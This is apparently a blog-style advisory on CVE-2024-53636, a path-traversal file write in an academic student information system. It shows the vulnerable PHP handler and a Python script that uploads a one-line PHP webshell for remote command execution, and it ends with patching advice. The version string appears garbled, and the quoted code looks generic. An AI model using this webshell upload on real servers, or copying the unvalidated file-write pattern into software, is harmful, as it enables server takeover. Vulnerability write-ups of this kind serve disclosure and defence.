CVE-2024-53636: Arbitrary File Upload Vulnerability in Serosoft Academia Student Information System (SIS) EagleR-1..118

CVE-2024-53636 is an arbitrary file upload vulnerability discovered in Serosoft's Academia Student Information System (SIS) EagleR-1..118. This vulnerability allows attackers to execute arbitrary code on the server by exploiting the weak file validation mechanism in the writefile.php file. In this post, we will discuss the specifics of this vulnerability, including code snippets, original references, and exploit details.

Vulnerability Details

The vulnerability exists in the writefile.php file of Serosoft Academia SIS EagleR-1..118. In this particular version, the filePath parameter does not properly validate user input, which allows attackers to execute arbitrary code by uploading a file with a crafted double-dot (../) path.

The vulnerable code in writefile.php looks like this

<?php
$filePath = $_POST['filePath'];
$content = $_POST['content'];

if (!empty($filePath) && !empty($content)) {
    file_put_contents($filePath, $content);
    echo "File written successfully!";
} else {
    echo "Error: Missing filePath or content.";
}
?>

As can be seen from the code snippet, the file_put_contents() function takes the user-supplied $filePath parameter and writes the content specified in the $content parameter to the specified file path. There is no proper validation applied to the $filePath parameter, allowing an attacker to upload a file with a crafted double-dot (../) in the path. This could lead to arbitrary code execution on the server.

Exploit Details

To exploit the vulnerability, an attacker could use a simple HTTP POST request to upload a PHP file with malicious code to the target server. A Python script example:

import requests

target_url = "http://example.com/academia/writefile.php";
file_path = "../uploads/malicious.php"
content = "<?php echo system($_GET['cmd']); ?>"

data = {
    'filePath': file_path,
    'content': content,
}

response = requests.post(target_url, data=data)

if response.status_code == 200:
    print("File uploaded!")
else:
    print("Error uploading file.")

Using this Python script, an attacker can upload a PHP file with malicious code, such as a webshell, to the server. Then, they can send GET requests to the malicious file, including their desired command as an argument in the 'cmd' parameter. This allows them to execute arbitrary code on the target server.

Original References

Serosoft has acknowledged the vulnerability and has assigned it CVE-2024-53636. For more information, visit the following links:

- Serosoft Security Advisory
- CVE-2024-53636 Details
- National Vulnerability Database Entry for CVE-2024-53636

Conclusion

CVE-2024-53636 is a serious vulnerability in the Serosoft Academia Student Information System (SIS) EagleR-1..118 that allows attackers to execute arbitrary code via a crafted file upload. To mitigate the risk, users of the Serosoft Academia SIS should update to the latest software version, which contains a fix for the vulnerability. It is crucial for software developers to properly validate and sanitize user input, especially when it comes to handling file uploads, as failure to do so can lead to severe vulnerabilities like this one.

Timeline

Published on: 04/26/2025 15:15:44 UTC
Last modified on: 04/29/2025 16:15:29 UTC